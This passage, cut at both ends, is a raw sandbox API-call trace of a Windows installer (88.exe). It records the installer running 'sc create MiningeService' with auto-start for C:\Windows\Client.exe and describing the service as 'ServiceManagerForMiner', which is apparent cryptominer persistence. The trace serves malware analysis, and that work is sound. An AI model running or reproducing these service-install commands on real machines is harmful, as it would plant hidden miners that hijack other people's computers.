(lpString="eService") returned 8 [0273.427] lstrcmpiA (lpString1="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", lpString2="/OEM") returned 1 [0273.427] GetVersion () returned 0x1db10106 [0273.427] GlobalLock (hMem=0x224003c) returned 0x2aec30 [0273.427] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x2d6fd20, dwRevision=0x1 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0273.427] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2d6fd20, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0273.427] CreatePipe (in: hReadPipe=0x2d6fd74, hWritePipe=0x2d6fd68, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd74*=0x1c, hWritePipe=0x2d6fd68*=0x20c) returned 1 [0273.427] CreatePipe (in: hReadPipe=0x2d6fd58, hWritePipe=0x2d6fd6c, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd58*=0x210, hWritePipe=0x2d6fd6c*=0x214) returned 1 [0273.427] GetStartupInfoA (in: lpStartupInfo=0x2d6fcdc | out: lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0273.427] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x214, hStdOutput=0x20c, hStdError=0x20c), lpProcessInformation=0x2d6fd34 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", lpProcessInformation=0x2d6fd34*(hProcess=0x21c, hThread=0x218, dwProcessId=0xa20, dwThreadId=0xa24)) returned 1 [0273.437] GetTickCount () returned 0x1d615d6 [0273.437] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.437] Sleep (dwMilliseconds=0x64) [0273.537] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0273.537] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0273.538] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.538] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.538] Sleep (dwMilliseconds=0x64) [0273.646] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0273.646] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0273.646] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.647] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.647] Sleep (dwMilliseconds=0x64) [0273.756] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0273.756] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0273.756] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.756] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.756] Sleep (dwMilliseconds=0x64) [0273.865] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0273.865] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0273.865] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.865] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.865] Sleep (dwMilliseconds=0x64) [0273.974] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0273.974] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0273.974] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.974] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0273.974] Sleep (dwMilliseconds=0x64) [0274.113] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0274.113] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0274.114] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0274.114] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0274.114] Sleep (dwMilliseconds=0x64) [0274.211] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0274.211] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0274.211] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0274.211] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0274.211] Sleep (dwMilliseconds=0x64) [0274.520] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0275.018] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.018] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x1c, lpBytesLeftThisMessage=0x0) returned 1 [0275.018] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x1c, lpBytesLeftThisMessage=0x0) returned 1 [0275.018] GetTickCount () returned 0x1d61b33 [0275.018] ReadFile (in: hFile=0x1c, lpBuffer=0x2d73078, nNumberOfBytesToRead=0x3ff, lpNumberOfBytesRead=0x2d6fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2d73078*, lpNumberOfBytesRead=0x2d6fd7c*=0x1c, lpOverlapped=0x0) returned 1 [0275.018] lstrlenA (lpString="") returned 0 [0275.018] lstrlenA (lpString="[SC] CreateService SUCCESS\r\n") returned 28 [0275.018] GlobalSize (hMem=0x224003c) returned 0x1000 [0275.019] lstrcatA (in: lpString1="", lpString2="[SC] CreateService SUCCESS\r\n" | out: lpString1="[SC] CreateService SUCCESS\r\n") returned="[SC] CreateService SUCCESS\r\n" [0275.019] lstrlenA (lpString="\x09") returned 1 [0275.019] lstrlenA (lpString="[SC] CreateService SUCCESS\r\n") returned 28 [0275.019] lstrcmpiA (lpString1="[", lpString2="\x09") returned 1 [0275.019] lstrlenA (lpString="SC] CreateService SUCCESS\r\n") returned 27 [0275.020] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0275.021] lstrlenA (lpString="C] CreateService SUCCESS\r\n") returned 26 [0275.021] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0275.021] lstrlenA (lpString="] CreateService SUCCESS\r\n") returned 25 [0275.021] lstrcmpiA (lpString1="]", lpString2="\x09") returned 1 [0275.021] lstrlenA (lpString=" CreateService SUCCESS\r\n") returned 24 [0275.021] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0275.021] lstrlenA (lpString="CreateService SUCCESS\r\n") returned 23 [0275.022] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0275.022] lstrlenA (lpString="reateService SUCCESS\r\n") returned 22 [0275.022] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0275.022] lstrlenA (lpString="eateService SUCCESS\r\n") returned 21 [0275.022] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0275.022] lstrlenA (lpString="ateService SUCCESS\r\n") returned 20 [0275.022] lstrcmpiA (lpString1="a", lpString2="\x09") returned 1 [0275.023] lstrlenA (lpString="teService SUCCESS\r\n") returned 19 [0275.023] lstrcmpiA (lpString1="t", lpString2="\x09") returned 1 [0275.023] lstrlenA (lpString="eService SUCCESS\r\n") returned 18 [0275.023] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0275.023] lstrlenA (lpString="Service SUCCESS\r\n") returned 17 [0275.023] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0275.024] lstrlenA (lpString="ervice SUCCESS\r\n") returned 16 [0275.024] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0275.024] lstrlenA (lpString="rvice SUCCESS\r\n") returned 15 [0275.024] lstrcmpiA (lpString1="r", lpString2="\x09") returned 1 [0275.024] lstrlenA (lpString="vice SUCCESS\r\n") returned 14 [0275.024] lstrcmpiA (lpString1="v", lpString2="\x09") returned 1 [0275.024] lstrlenA (lpString="ice SUCCESS\r\n") returned 13 [0275.024] lstrcmpiA (lpString1="i", lpString2="\x09") returned 1 [0275.025] lstrlenA (lpString="ce SUCCESS\r\n") returned 12 [0275.025] lstrcmpiA (lpString1="c", lpString2="\x09") returned 1 [0275.025] lstrlenA (lpString="e SUCCESS\r\n") returned 11 [0275.025] lstrcmpiA (lpString1="e", lpString2="\x09") returned 1 [0275.025] lstrlenA (lpString=" SUCCESS\r\n") returned 10 [0275.025] lstrcmpiA (lpString1=" ", lpString2="\x09") returned -1 [0275.026] lstrlenA (lpString="SUCCESS\r\n") returned 9 [0275.026] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0275.026] lstrlenA (lpString="UCCESS\r\n") returned 8 [0275.026] lstrcmpiA (lpString1="U", lpString2="\x09") returned 1 [0275.026] lstrlenA (lpString="CCESS\r\n") returned 7 [0275.026] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0275.026] lstrlenA (lpString="CESS\r\n") returned 6 [0275.027] lstrcmpiA (lpString1="C", lpString2="\x09") returned 1 [0275.027] lstrlenA (lpString="ESS\r\n") returned 5 [0275.027] lstrcmpiA (lpString1="E", lpString2="\x09") returned 1 [0275.027] lstrlenA (lpString="SS\r\n") returned 4 [0275.027] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0275.027] lstrlenA (lpString="S\r\n") returned 3 [0275.027] lstrcmpiA (lpString1="S", lpString2="\x09") returned 1 [0275.028] lstrlenA (lpString="\r\n") returned 2 [0275.028] lstrcmpiA (lpString1="\r", lpString2="\x09") returned 1 [0275.028] lstrlenA (lpString="\n") returned 1 [0275.028] lstrcmpiA (lpString1="\n", lpString2="\x09") returned 1 [0275.028] lstrlenA (lpString="") returned 0 [0275.029] lstrlenA (lpString="[SC] CreateService SUCCESS") returned 26 [0275.029] OemToCharBuffA (in: lpszSrc="[SC] CreateService SUCCESS", lpszDst=0x2aec30, cchDstLength=0x1a | out: lpszDst="[SC] CreateService SUCCESS") returned 1 [0275.029] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x13 [0275.029] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fb14) returned 0x13 [0275.032] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x13, lParam=0x0) returned 0x1 [0275.034] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0275.034] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.034] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.035] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.035] Sleep (dwMilliseconds=0x64) [0275.145] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0275.145] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.145] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.145] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.146] Sleep (dwMilliseconds=0x64) [0275.255] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0275.255] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.255] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.255] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.255] Sleep (dwMilliseconds=0x64) [0275.410] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x102 [0275.410] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0275.410] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.410] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.410] Sleep (dwMilliseconds=0x64) [0275.518] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x0 [0275.518] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x0) returned 1 [0275.519] PeekNamedPipe (in: hNamedPipe=0x1c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0275.519] wsprintfA (in: param_1=0x2d6fc5c, param_2="%d" | out: param_1="0") returned 1 [0275.519] lstrcpynA (in: lpString1=0x2ae004, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0275.519] CloseHandle (hObject=0x218) returned 1 [0275.519] CloseHandle (hObject=0x21c) returned 1 [0275.519] CloseHandle (hObject=0x20c) returned 1 [0275.519] CloseHandle (hObject=0x1c) returned 1 [0275.519] CloseHandle (hObject=0x214) returned 1 [0275.519] CloseHandle (hObject=0x210) returned 1 [0275.520] GlobalUnlock (hMem=0x224003c) returned 0 [0275.520] FreeLibrary (hLibModule=0x2d70000) returned 1 [0275.521] MulDiv (nNumber=46, nNumerator=30000, nDenominator=60) returned 23000 [0275.521] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x59d8, lParam=0x0) returned 0x57e4 [0275.522] lstrcpynA (in: lpString1=0x42a048, lpString2="Set description services MiningeService...", iMaxLength=1024 | out: lpString1="Set description services MiningeService...") returned="Set description services MiningeService..." [0275.522] lstrlenA (lpString="Set description services MiningeService...") returned 42 [0275.522] SetWindowTextA (hWnd=0x20324, lpString="Set description services MiningeService...") returned 1 [0275.523] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x14 [0275.523] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x14 [0275.526] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x14, lParam=0x0) returned 0x1 [0275.528] MulDiv (nNumber=47, nNumerator=30000, nDenominator=60) returned 23500 [0275.528] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x5bcc, lParam=0x0) returned 0x59d8 [0275.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0275.532] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0275.533] lstrcpynA (in: lpString1=0x40ac10, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0275.533] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0275.533] lstrcmpiA (lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpString2="") returned 1 [0275.533] MulDiv (nNumber=48, nNumerator=30000, nDenominator=60) returned 24000 [0275.533] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x5dc0, lParam=0x0) returned 0x5bcc [0275.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0275.535] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0275.535] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0275.535] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0275.535] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll")) returned 0x2020 [0275.536] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0275.536] lstrcpynA (in: lpString1=0x42a048, lpString2="Skipped: ", iMaxLength=1024 | out: lpString1="Skipped: ") returned="Skipped: " [0275.536] lstrlenA (lpString="Skipped: ") returned 9 [0275.536] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 59 [0275.536] lstrcatA (in: lpString1="Skipped: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" | out: lpString1="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0275.536] MulDiv (nNumber=49, nNumerator=30000, nDenominator=60) returned 24500 [0275.536] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x5fb4, lParam=0x0) returned 0x5dc0 [0275.536] MulDiv (nNumber=50, nNumerator=30000, nDenominator=60) returned 25000 [0275.537] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x61a8, lParam=0x0) returned 0x5fb4 [0275.537] GetVersion () returned 0x1db10106 [0275.537] GetSystemDirectoryA (in: lpBuffer=0x42e3a0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0275.538] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0275.538] lstrcpynA (in: lpString1=0x2ae414, lpString2="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner", iMaxLength=1024 | out: lpString1="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner") returned="C:\\Windows\\system32\\cmd.exe /C sc description MiningeService ServiceManagerForMiner" [0275.538] MulDiv (nNumber=51, nNumerator=30000, nDenominator=60) returned 25500 [0275.538] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x639c, lParam=0x0) returned 0x61a8 [0275.538] lstrcpynA (in: lpString1=0x2ae824, lpString2="/OEM", iMaxLength=1024 | out: lpString1="/OEM") returned="/OEM" [0275.538] MulDiv (nNumber=52, nNumerator=30000, nDenominator=60) returned 26000 [0275.538] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x6590, lParam=0x0) returned 0x639c [0275.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0275.539] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0275.539] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0275.540] lstrcpynA (in: lpString1=0x40a410, lpString2="ExecToLog", iMaxLength=1024 | out: lpString1="ExecToLog") returned="ExecToLog" [0275.540] GetModuleHandleA 